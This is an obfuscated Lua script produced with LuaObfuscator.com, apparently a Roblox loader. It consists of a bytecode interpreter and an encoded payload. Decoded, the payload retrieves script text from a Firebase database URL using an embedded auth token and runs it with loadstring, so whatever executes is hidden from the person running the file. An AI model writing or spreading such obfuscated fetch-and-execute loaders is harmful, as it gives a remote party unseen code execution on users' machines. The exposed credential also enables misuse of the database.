--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v102=0;local v103;while true do if (v102==0) then v103=v5(v85,v19);v19=nil;v102=1;end if (v102==1) then return v103;end end else return v85;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v86-(v86%((1809 -(282 + 595)) -((2494 -(1523 + 114)) + 74))) ;else local v87=0;local v88;while true do if (v87==0) then v88=(570 -(367 + 201))^(v32-(928 -(193 + 21 + 713))) ;return (((v31%(v88 + v88))>=v88) and (1 + (0 -0))) or (0 + 0) ;end end end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -(0 + 0))) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end end end local function v22() local v36=957 -((2401 -1509) + 65) ;local v37;local v38;while true do if (v36==((0 -0) -0)) then v37,v38=v1(v16,v18,v18 + ((3 + 0) -1) );v18=v18 + (4 -2) ;v36=1 + 0 ;end if (v36==(1 -0)) then return (v38 * (1208 -((1799 -(915 + 82)) + 150))) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (8 -5) );v18=v18 + 4 ;return (v42 * (9773502 + 7003714)) + (v41 * 65536) + (v40 * (336 -80)) + v39 ;end local function v24() local v43=1423 -(630 + 793) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1187 -(1069 + 118))) then v44=v23();v45=v23();v43=2 -1 ;end if (v43==(3 -1)) then v48=v20(v45,4 + 17 ,54 -23 );v49=((v20(v45,32 + 0 )==(792 -((1246 -878) + 423))) and  -(3 -(1 + 1))) or (19 -(4 + 6 + (37 -29))) ;v43=3;end if (v43==(11 -8)) then if (v48==(442 -(416 + 26))) then if (v47==(0 -0)) then return v49 * (0 + 0) ;else local v104=0;while true do if (v104==(0 -(885 -(261 + 624)))) then v48=(173 + 266) -(145 + 293) ;v46=0;break;end end end elseif (v48==(2477 -(44 + 386))) then return ((v47==(1486 -(998 + 488))) and (v49 * ((1 + 0)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1795 -(201 + 571)) ) * (v46 + (v47/(((2025 -885) -(116 + 1022))^52))) ;end if (v43==(4 -3)) then v46=1;v47=(v20(v45,1 + (1080 -(1020 + 60)) ,73 -53 ) * ((7 -5)^(891 -(814 + 45)))) + v44 ;v43=4 -2 ;end end end local function v25(v50) local v51;if  not v50 then local v89=0 -0 ;while true do if (0==v89) then v50=v23();if (v50==(1747 -(760 + 340 + 647))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1914 -(1789 + (341 -217))) );v18=v18 + v50 ;local v52={};for v66=767 -(745 + 21) , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 74 -(71 + 3) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0 + 0 ;end)();while true do if (v68==1) then if (2==v53) then for v105= #"]",v23() do local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();while true do if (v106==(0 -0)) then v107=(function() return v21();end)();if (v20(v107, #"[", #"{")==0) then local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if ((243 -(187 + 54))~=v110) then else if (v20(v112, #"{", #"/")~= #"}") then else v113[2]=(function() return v59[v113[2]];end)();end if (v20(v112,2,2)== #"|") then v113[ #"gha"]=(function() return v59[v113[ #"asd"]];end)();end v110=(function() return 3;end)();end if (v110~=(781 -(162 + 618))) then else local v135=(function() return 0 + 0 ;end)();while true do if (v135==1) then v110=(function() return 2;end)();break;end if (v135==(0 + 0)) then v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==(0 -0)) then local v205=(function() return 0 -0 ;end)();local v206=(function() return;end)();while true do if ((0 + 0)==v205) then v206=(function() return 0;end)();while true do if (v206==(1636 -(1373 + 263))) then v113[ #"asd"]=(function() return v22();end)();v113[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v111== #":") then v113[ #"91("]=(function() return v23();end)();elseif (v111==2) then v113[ #"asd"]=(function() return v23() -((1002 -(451 + 549))^(6 + 10)) ;end)();elseif (v111== #"19(") then local v213=(function() return 0 -0 ;end)();local v214=(function() return;end)();while true do if (v213~=(0 -0)) then else v214=(function() return 0;end)();while true do if (v214~=(1384 -(746 + 638))) then else v113[ #"asd"]=(function() return v23() -(2^16) ;end)();v113[ #".dev"]=(function() return v22();end)();break;end end break;end end end v135=(function() return 1;end)();end end end if (v110~=3) then else if (v20(v112, #"xnx", #"91(")~= #"[") then else v113[ #"0836"]=(function() return v59[v113[ #"http"]];end)();end v54[v105]=(function() return v113;end)();break;end if (v110==(0 + 0)) then v111=(function() return v20(v107,2, #"19(");end)();v112=(function() return v20(v107, #"?id=",8 -2 );end)();v110=(function() return 342 -(218 + 123) ;end)();end end end break;end end end for v108= #"}",v23() do v55[v108-#">" ]=(function() return v28();end)();end return v57;end break;end if (v68==0) then if (0==v53) then local v98=(function() return 0;end)();local v99=(function() return;end)();while true do if (v98~=(1581 -(1535 + 46))) then else v99=(function() return 0 + 0 ;end)();while true do if (v99~=1) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v99=(function() return 1 + 1 ;end)();end if (v99~=(562 -(306 + 254))) then else v53=(function() return  #"[";end)();break;end if (v99==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v99=(function() return 1 -0 ;end)();end end break;end end end if ( #"<"==v53) then local v100=(function() return 1467 -(899 + 568) ;end)();local v101=(function() return;end)();while true do if (v100==(0 + 0)) then v101=(function() return 0;end)();while true do if (v101==0) then v58=(function() return v23();end)();v59=(function() return {};end)();v101=(function() return 2 -1 ;end)();end if (v101~=(604 -(268 + 335))) then else for v115= #"|",v58 do local v116=(function() return 0;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==(290 -(60 + 230))) then local v176=(function() return 572 -(426 + 146) ;end)();local v177=(function() return;end)();while true do if (v176==(0 + 0)) then v177=(function() return 1456 -(282 + 1174) ;end)();while true do if (v177~=1) then else v116=(function() return 1;end)();break;end if (v177==(811 -(569 + 242))) then v117=(function() return 0;end)();v118=(function() return nil;end)();v177=(function() return 2 -1 ;end)();end end break;end end end if (v116==1) then v119=(function() return nil;end)();while true do if (v117~=(0 + 0)) then else local v196=(function() return 0;end)();local v197=(function() return;end)();while true do if (v196~=0) then else v197=(function() return 1024 -(706 + 318) ;end)();while true do if ((1251 -(721 + 530))==v197) then v118=(function() return v21();end)();v119=(function() return nil;end)();v197=(function() return 1;end)();end if (v197==(1272 -(945 + 326))) then v117=(function() return  #" ";end)();break;end end break;end end end if (v117~= #"!") then else if (v118== #":") then v119=(function() return v21()~=0 ;end)();elseif (v118==2) then v119=(function() return v24();end)();elseif (v118== #"xnx") then v119=(function() return v25();end)();end v59[v115]=(function() return v119;end)();break;end end break;end end end v57[ #"nil"]=(function() return v21();end)();v101=(function() return 4 -2 ;end)();end if (2==v101) then v53=(function() return 2 + 0 ;end)();break;end end break;end end end v68=(function() return 1;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[702 -((1210 -(714 + 225)) + 429) ];local v65=v60[3 + 0 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=(2364 -(240 + 619)) -(88 + 275 + (3334 -2193)) ;local v74= -(1501 -((2239 -831) + 92));local v75={};local v76={...};local v77=v12("#",...) -(1289 -(993 + 295)) ;local v78={};local v79={};for v90=0,v77 do if (v90>=v71) then v75[v90-v71 ]=v76[v90 + 1 + 0 + 0 ];else v79[v90]=v76[v90 + ((78 + 1094) -(418 + 753)) ];end end local v80=(v77-v71) + 1 + 0 ;local v81;local v82;while true do local v91=0 + 0 ;while true do if ((3595<4902) and (v91==((1745 -(1344 + 400)) + (0 -0)))) then if (v82<=(4 + 8)) then if (v82<=(534 -(406 + 123))) then if ((v82<=2) or (1473>=3332)) then if (v82<=(1933 -(565 + 1368))) then local v120=v81[7 -5 ];local v121=v79[v81[(2578 -(118 + 688)) -(1749 + 20) ]];v79[v120 + ((406 -(255 + 150)) -0) ]=v121;v79[v120]=v121[v81[1 + 3 ]];elseif ((v82==(1323 -(1249 + 73))) or (3852==293)) then do return;end else local v137=0 + 0 ;local v138;while true do if (((1145 -(466 + 679))==v137) or (1559==4588)) then v138=v81[4 -(50 -(25 + 23)) ];v79[v138]=v79[v138](v79[v138 + (2 -1) ]);break;end end end elseif ((v82<=(307 -(244 + 60))) or (4051<=1157)) then v79[v81[(369 + 1533) -((1992 -(927 + 959)) + 1794) ]]=v79[v81[1 + (6 -4) ]][v81[(734 -(16 + 716)) + 2 ]];elseif (v82==((7 -3) + 0)) then local v139=0 -(0 + 0) ;local v140;while true do if (v139==(0 -(97 -(11 + 86)))) then v140=v81[(282 -166) -(4 + 110) ];v79[v140]=v79[v140](v13(v79,v140 + (585 -(57 + 527)) ,v74));break;end end else v79[v81[1429 -(41 + 1386) ]]();end elseif ((v82<=(275 -(176 + (293 -202)))) or (4484==788)) then if (v82<=(15 -9)) then v79[v81[105 -(17 + 86) ]]=v62[v81[3 + 0 ]];elseif (v82==(1099 -(975 + 117))) then local v141=0 -0 ;local v142;local v143;local v144;local v145;while true do if ((604<2881) and (v141==(2 -(286 -(175 + 110))))) then v74=(v144 + v142) -(167 -(122 + 44)) ;v145=0 -0 ;v141=(1745 -(404 + 1335)) -4 ;end if ((2 + (406 -(183 + 223)))==v141) then for v199=v142,v74 do local v200=(0 -0) -0 ;while true do if (v200==((675 + 343) -(697 + 321))) then v145=v145 + (2 -1) + 0 ;v79[v199]=v143[v145];break;end end end break;end if ((v141==0) or (900==3377)) then v142=v81[3 -1 ];v143,v144=v72(v79[v142](v13(v79,v142 + (66 -(30 + 35)) ,v81[3 + 0 ])));v141=(453 + 805) -(1043 + 214) ;end end else local v146=v81[7 -5 ];v79[v146]=v79[v146](v13(v79,v146 + (1213 -(323 + (4384 -3495))) ,v74));end elseif ((4459>591) and (v82<=(1237 -(322 + 905)))) then if (v82==(23 -14)) then local v148=v81[582 -(361 + (556 -(10 + 327))) ];v79[v148]=v79[v148](v79[v148 + (321 -(53 + 267)) ]);else v79[v81[874 -(826 + 46) ]]();end elseif ((3398>=2395) and (v82==(3 + 8))) then local v150=413 -(15 + 398) ;local v151;local v152;local v153;local v154;while true do if (((4568>=3907) and (v150==(983 -(13 + 5 + 964)))) or (2183>=2824)) then v74=(v153 + v151) -(3 -2) ;v154=0 + 0 ;v150=2 + 0 ;end if (v150==(850 -(20 + 830))) then v151=v81[2 + 0 ];v152,v153=v72(v79[v151](v13(v79,v151 + (127 -(116 + 10)) ,v81[1 + (340 -(118 + 220)) ])));v150=1797 -(503 + 1293) ;end if (v150==(6 -4)) then for v201=v151,v74 do v154=v154 + (739 -(542 + 196)) ;v79[v201]=v152[v154];end break;end end else local v155=v81[6 -3 ];local v156=v79[v155];for v178=v155 + 1 + 0 ,v81[11 -7 ] do v156=v156   .. v79[v178] ;end v79[v81[1207 -(902 + 303) ]]=v156;end elseif ((1936==1936) and (v82<=18)) then if ((v82<=(32 -17)) or (4832<4313)) then if ((4088>3874) and (v82<=(3 + 4 + 6))) then v79[v81[1 + (450 -(108 + 341)) ]]=v81[7 -4 ];elseif (v82==((97 -62) -21)) then v79[v81[1553 -(506 + 620 + (1796 -1371)) ]]=v79[v81[(296 + 112) -((1179 -(810 + 251)) + 287) ]][v79[v81[15 -11 ]]];else v79[v81[1465 -(1404 + 59) ]]=v29(v70[v81[(2617 -(711 + 782)) -(118 + 1003) ]],nil,v62);end elseif ((1246<3470) and (v82<=((87 -41) -(499 -(270 + 199))))) then v79[v81[1 + 1 ]]=v79[v81[380 -(142 + 235) ]][v79[v81[18 -14 ]]];elseif ((4332==4332) and (v82>(4 + 10 + 3))) then v79[v81[4 -2 ]]=v79[v81[980 -(553 + 424) ]][v81[7 -3 ]];else v79[v81[2 + 0 ]]=v29(v70[v81[3 + 0 ]],nil,v62);end elseif ((4068>=972) and (v82<=(13 + 8))) then if ((493<3893) and (v82<=19)) then v79[v81[1 + 1 ]]=v62[v81[(1825 -(580 + 1239)) -3 ]];elseif (v82>(12 + 8)) then v62[v81[1 + (5 -3) ]]=v79[v81[5 -3 ]];else local v166=0 -0 ;local v167;local v168;while true do if (v166==(2 -(1 + 0))) then v79[v167 + (1 -0) ]=v168;v79[v167]=v168[v81[8 -4 ]];break;end if (v166==(0 + 0)) then v167=v81[1 + 1 ];v168=v79[v81[14 -11 ]];v166=1 + 0 ;end end end elseif (v82<=((28 + 748) -(239 + 224 + 290))) then if (v82==(8 + 14)) then v79[v81[1331 -(719 + 78 + 532) ]]=v81[3 + (0 -0) ];else v62[v81[2 + (534 -(43 + 490)) ]]=v79[v81[4 -2 ]];end elseif (v82==(56 -32)) then do return;end else local v173=0 + 0 ;local v174;local v175;while true do if (((748 + 455) -(373 + 829))==v173) then for v204=v174 + (732 -(476 + 255)) ,v81[1134 -(369 + 761) ] do v175=v175   .. v79[v204] ;end v79[v81[(1169 -(645 + 522)) + 0 ]]=v175;break;end if ((3999>=2900) and (v173==(0 -0))) then v174=v81[5 -2 ];v175=v79[v174];v173=239 -(64 + 174) ;end end end v73=v73 + (734 -(711 + 22)) + 0 ;break;end if (v91==((0 -0) -0)) then v81=v69[v73];v82=v81[337 -(144 + (1982 -(1010 + 780))) ];v91=217 -(42 + 174) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!013O0003073O006578656375746500033O0002117O0012153O00014O00183O00013O00013O000A3O00030A3O006C6F6164737472696E6703043O0067616D65030B3O00482O747053657276696365030A3O004A534F4E4465636F6465030C3O00482O74704765744173796E63033B3O00682O7470733A2O2F7363726970742D70726F746563746F722D31303539362D64656661756C742D727464622E6669726562617365696F2E636F6D2F030B3O002E6A736F6E3F617574683D03283O00374C6671664B583858336E6B44487662336158532O7A576B4A2O57674C775665384F72636D35636A03073O00536372697074732O033O004B657901123O001213000100013O001213000200023O00200300020002000300202O000200020004001213000400023O00202O00040004000500120D000600063O00120D000700073O00120D000800084O00190006000600082O0007000400064O000800023O00020020030002000200092O000E000200023O00200300020002000A2O00020001000200022O00050001000100012O00183O00017O00",v9(),...);
